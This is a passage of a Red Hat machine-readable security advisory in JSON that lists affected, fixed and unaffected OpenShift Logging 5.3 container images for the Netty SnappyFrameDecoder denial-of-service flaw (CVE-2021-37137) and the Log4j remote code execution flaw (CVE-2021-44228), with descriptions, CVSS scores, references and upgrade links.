"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004135"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37137"
},
{
"category": "external",
"summary": "RHBZ#2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T19:37:00+00:00",
"details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T19:37:00+00:00",
"details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html",
"product_ids": [
